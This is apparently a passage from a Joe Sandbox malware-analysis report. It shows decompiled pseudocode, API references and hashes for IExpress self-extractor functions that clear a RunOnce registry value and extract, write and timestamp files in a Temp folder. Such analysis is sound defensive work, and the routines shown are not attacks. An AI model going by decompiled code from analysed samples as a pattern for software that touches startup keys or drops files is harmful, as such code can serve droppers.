                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0002538C,?,?,0002538C), ref: 00022005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0002538C,wextract_cleanup1,?,?,0002538C), ref: 00022017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0002538C,?,?,0002538C), ref: 00022020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                                • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                                • Opcode ID: 3fbeef61538692a247ddb4faac7ed81823a5baacac5356b93f042a40fecbfa20
                                                                                                                                                                                                                                                • Instruction ID: 1041649ac341ce304e175116f8be8522c52536476d647310b162d83d11abb674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fbeef61538692a247ddb4faac7ed81823a5baacac5356b93f042a40fecbfa20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E04F34A51328FBEB318BD0FC8EF597B69EB01780F2002D4BA04A0061EF655E15D705
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00024CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x28004; // 0xf4950d3e
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x291d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00024E99(_t75);
						L35:
						return E00026CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x28584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x291e4;
						_t58 = 0x291e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x291e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x291e4;
						_t30 = E00024702( &_v268, 0x291e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0002476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00024980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E000247E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x293f4 =  *0x293f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x291e4;
						_t63 = 0x291e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x291e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x291e4;
						_t30 = E00024702( &_v268, 0x291e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00024C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00024B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00024B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                                0x00024cd0
                                                                                                                                                                                                                                                0x00024cdb
                                                                                                                                                                                                                                                0x00024ce0
                                                                                                                                                                                                                                                0x00024ce2
                                                                                                                                                                                                                                                0x00024cee
                                                                                                                                                                                                                                                0x00024cf2
                                                                                                                                                                                                                                                0x00024d0e
                                                                                                                                                                                                                                                0x00024d0e
                                                                                                                                                                                                                                                0x00024d11
                                                                                                                                                                                                                                                0x00024e83
                                                                                                                                                                                                                                                0x00024e88
                                                                                                                                                                                                                                                0x00024e98
                                                                                                                                                                                                                                                0x00024e98
                                                                                                                                                                                                                                                0x00024d17
                                                                                                                                                                                                                                                0x00024d17
                                                                                                                                                                                                                                                0x00024d1a
                                                                                                                                                                                                                                                0x00024d2f
                                                                                                                                                                                                                                                0x00024d2f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d2f
                                                                                                                                                                                                                                                0x00024d1c
                                                                                                                                                                                                                                                0x00024d1c
                                                                                                                                                                                                                                                0x00024d1f
                                                                                                                                                                                                                                                0x00024dcb
                                                                                                                                                                                                                                                0x00024dd0
                                                                                                                                                                                                                                                0x00024dd2
                                                                                                                                                                                                                                                0x00024ddd
                                                                                                                                                                                                                                                0x00024ddd
                                                                                                                                                                                                                                                0x00024de3
                                                                                                                                                                                                                                                0x00024de8
                                                                                                                                                                                                                                                0x00024ded
                                                                                                                                                                                                                                                0x00024ded
                                                                                                                                                                                                                                                0x00024def
                                                                                                                                                                                                                                                0x00024df0
                                                                                                                                                                                                                                                0x00024df0
                                                                                                                                                                                                                                                0x00024df4
                                                                                                                                                                                                                                                0x00024df4
                                                                                                                                                                                                                                                0x00024df6
                                                                                                                                                                                                                                                0x00024df9
                                                                                                                                                                                                                                                0x00024dfc
                                                                                                                                                                                                                                                0x00024dfc
                                                                                                                                                                                                                                                0x00024dfe
                                                                                                                                                                                                                                                0x00024dff
                                                                                                                                                                                                                                                0x00024dff
                                                                                                                                                                                                                                                0x00024e03
                                                                                                                                                                                                                                                0x00024e08
                                                                                                                                                                                                                                                0x00024e0a
                                                                                                                                                                                                                                                0x00024e0f
                                                                                                                                                                                                                                                0x00024d03
                                                                                                                                                                                                                                                0x00024d03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d03
                                                                                                                                                                                                                                                0x00024e18
                                                                                                                                                                                                                                                0x00024e20
                                                                                                                                                                                                                                                0x00024e25
                                                                                                                                                                                                                                                0x00024e27
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024e33
                                                                                                                                                                                                                                                0x00024e38
                                                                                                                                                                                                                                                0x00024e3a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024e40
                                                                                                                                                                                                                                                0x00024e51
                                                                                                                                                                                                                                                0x00024e56
                                                                                                                                                                                                                                                0x00024e5b
                                                                                                                                                                                                                                                0x00024e5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024e6a
                                                                                                                                                                                                                                                0x00024e6f
                                                                                                                                                                                                                                                0x00024e71
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024e77
                                                                                                                                                                                                                                                0x00024e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024e7d
                                                                                                                                                                                                                                                0x00024d25
                                                                                                                                                                                                                                                0x00024d25
                                                                                                                                                                                                                                                0x00024d28
                                                                                                                                                                                                                                                0x00024d36
                                                                                                                                                                                                                                                0x00024d3b
                                                                                                                                                                                                                                                0x00024d40
                                                                                                                                                                                                                                                0x00024d40
                                                                                                                                                                                                                                                0x00024d42
                                                                                                                                                                                                                                                0x00024d43
                                                                                                                                                                                                                                                0x00024d43
                                                                                                                                                                                                                                                0x00024d47
                                                                                                                                                                                                                                                0x00024d4a
                                                                                                                                                                                                                                                0x00024d4a
                                                                                                                                                                                                                                                0x00024d4c
                                                                                                                                                                                                                                                0x00024d4f
                                                                                                                                                                                                                                                0x00024d4f
                                                                                                                                                                                                                                                0x00024d51
                                                                                                                                                                                                                                                0x00024d52
                                                                                                                                                                                                                                                0x00024d52
                                                                                                                                                                                                                                                0x00024d56
                                                                                                                                                                                                                                                0x00024d5b
                                                                                                                                                                                                                                                0x00024d5d
                                                                                                                                                                                                                                                0x00024d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d67
                                                                                                                                                                                                                                                0x00024d6f
                                                                                                                                                                                                                                                0x00024d74
                                                                                                                                                                                                                                                0x00024d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d7c
                                                                                                                                                                                                                                                0x00024d84
                                                                                                                                                                                                                                                0x00024d89
                                                                                                                                                                                                                                                0x00024d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d94
                                                                                                                                                                                                                                                0x00024d99
                                                                                                                                                                                                                                                0x00024d9e
                                                                                                                                                                                                                                                0x00024da1
                                                                                                                                                                                                                                                0x00024daa
                                                                                                                                                                                                                                                0x00024daa
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024da3
                                                                                                                                                                                                                                                0x00024db5
                                                                                                                                                                                                                                                0x00024dbb
                                                                                                                                                                                                                                                0x00024dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024dc3
                                                                                                                                                                                                                                                0x00024dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024dc5
                                                                                                                                                                                                                                                0x00024dbd
                                                                                                                                                                                                                                                0x00024d2a
                                                                                                                                                                                                                                                0x00024d2a
                                                                                                                                                                                                                                                0x00024d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024d2d
                                                                                                                                                                                                                                                0x00024cf8
                                                                                                                                                                                                                                                0x00024cfd
                                                                                                                                                                                                                                                0x00024d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00024DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00024DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-1116576409
                                                                                                                                                                                                                                                • Opcode ID: da16abfd7491fa916cbcaa1754b60cf03c6122da94f04ae4c136609a9f13f4fe
                                                                                                                                                                                                                                                • Instruction ID: 447634786b9788c2f9bc02f3e0d40f80f58e596fe0eb1b8f48cec0305a307053
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da16abfd7491fa916cbcaa1754b60cf03c6122da94f04ae4c136609a9f13f4fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 264145362041218BCF719F38FC446F973E5EB45300F148668E89697292DF72DE8ACB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x28d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x28d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                                0x00024c40
                                                                                                                                                                                                                                                0x00024c4a
                                                                                                                                                                                                                                                0x00024c8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024c70
                                                                                                                                                                                                                                                0x00024c70
                                                                                                                                                                                                                                                0x00024c7e
                                                                                                                                                                                                                                                0x00024c86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024c8a

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00024C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00024C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00024C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: df42948ae0974a2930cff98e5e6616f6866b961df0d9c49f18d3dd78512688bd
                                                                                                                                                                                                                                                • Instruction ID: f00e772a25b29707d6673416800e1fb6e10e3dfb8128f624a2dafa944aaee0ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df42948ae0974a2930cff98e5e6616f6866b961df0d9c49f18d3dd78512688bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF0907260122CAFABA5DFB8EC49DFBB7ECEF05350B54453AE816C1050EA34E914C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0002487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0002490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                                0x00024880
                                                                                                                                                                                                                                                0x0002488c
                                                                                                                                                                                                                                                0x00024894
                                                                                                                                                                                                                                                0x000248a0
                                                                                                                                                                                                                                                0x000248c9
                                                                                                                                                                                                                                                0x000248ce
                                                                                                                                                                                                                                                0x000248a2
                                                                                                                                                                                                                                                0x000248a8
                                                                                                                                                                                                                                                0x000248b7
                                                                                                                                                                                                                                                0x000248bc
                                                                                                                                                                                                                                                0x000248aa
                                                                                                                                                                                                                                                0x000248ac
                                                                                                                                                                                                                                                0x000248ac
                                                                                                                                                                                                                                                0x000248a8
                                                                                                                                                                                                                                                0x000248de
                                                                                                                                                                                                                                                0x000248e7
                                                                                                                                                                                                                                                0x0002490b
                                                                                                                                                                                                                                                0x000248ee
                                                                                                                                                                                                                                                0x000248f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024902

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00024A23,?,00024F67,*MEMCAB,00008000,00000180), ref: 000248DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00024F67,*MEMCAB,00008000,00000180), ref: 00024902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: f62bf058170c9a0b17c325c42d305daf255336e39c6c2a514540c2338e97fee5
                                                                                                                                                                                                                                                • Instruction ID: 5a114de96ffb24289ac2cac785f7ffc83196384f3dbca4de9162fc202e203d96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62bf058170c9a0b17c325c42d305daf255336e39c6c2a514540c2338e97fee5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76014BA3E2157026F3744129AC88FBB555CCB9A734F2B1335BDAAE71D2D9644C4481E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00024AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x2858c; // 0x268
				_t9 = E00023680(_t20);
				if( *0x291d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x28d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x29400; // 0xc1c00
							_t15 = _t14 + _t25;
							 *0x29400 = _t15;
							if( *0x28184 != 0) {
								_t21 =  *0x28584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x293f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                                0x00024ad5
                                                                                                                                                                                                                                                0x00024adb
                                                                                                                                                                                                                                                0x00024ae7
                                                                                                                                                                                                                                                0x00024aee
                                                                                                                                                                                                                                                0x00024b05
                                                                                                                                                                                                                                                0x00024b0d
                                                                                                                                                                                                                                                0x00024b14
                                                                                                                                                                                                                                                0x00024b1a
                                                                                                                                                                                                                                                0x00024b1c
                                                                                                                                                                                                                                                0x00024b21
                                                                                                                                                                                                                                                0x00024b2a
                                                                                                                                                                                                                                                0x00024b2f
                                                                                                                                                                                                                                                0x00024b31
                                                                                                                                                                                                                                                0x00024b39
                                                                                                                                                                                                                                                0x00024b54
                                                                                                                                                                                                                                                0x00024b54
                                                                                                                                                                                                                                                0x00024b39
                                                                                                                                                                                                                                                0x00024b2f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b0f
                                                                                                                                                                                                                                                0x00024b5e
                                                                                                                                                                                                                                                0x00024ae9
                                                                                                                                                                                                                                                0x00024aed
                                                                                                                                                                                                                                                0x00024aed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0002369F
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236B2
                                                                                                                                                                                                                                                  • Part of subcall function 00023680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000236DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00024B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: cfd3a6b4c33d0607fd285670ba1386df75777f6dabe30237ef21213b6297e05e
                                                                                                                                                                                                                                                • Instruction ID: 2f8107840ac9f9c8d2091bb821f9a861035c7ea6d9676e1170b61eefad9823c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd3a6b4c33d0607fd285670ba1386df75777f6dabe30237ef21213b6297e05e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8019E31201221ABEB258F68EC05BA67799FB45725F24C225F939971F0CB74D856CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0002658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x28b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x28b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E000216B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                                0x00026592
                                                                                                                                                                                                                                                0x00026594
                                                                                                                                                                                                                                                0x00026596
                                                                                                                                                                                                                                                0x00026598
                                                                                                                                                                                                                                                0x00026598
                                                                                                                                                                                                                                                0x0002659b
                                                                                                                                                                                                                                                0x0002659b
                                                                                                                                                                                                                                                0x0002659d
                                                                                                                                                                                                                                                0x0002659e
                                                                                                                                                                                                                                                0x000265a2
                                                                                                                                                                                                                                                0x000265a4
                                                                                                                                                                                                                                                0x000265a9
                                                                                                                                                                                                                                                0x000265b2
                                                                                                                                                                                                                                                0x000265b6
                                                                                                                                                                                                                                                0x000265ba
                                                                                                                                                                                                                                                0x000265c3
                                                                                                                                                                                                                                                0x000265c5
                                                                                                                                                                                                                                                0x000265c8
                                                                                                                                                                                                                                                0x000265c8
                                                                                                                                                                                                                                                0x000265c3
                                                                                                                                                                                                                                                0x000265c9
                                                                                                                                                                                                                                                0x000265cc
                                                                                                                                                                                                                                                0x000265d2
                                                                                                                                                                                                                                                0x000265d1
                                                                                                                                                                                                                                                0x000265d1
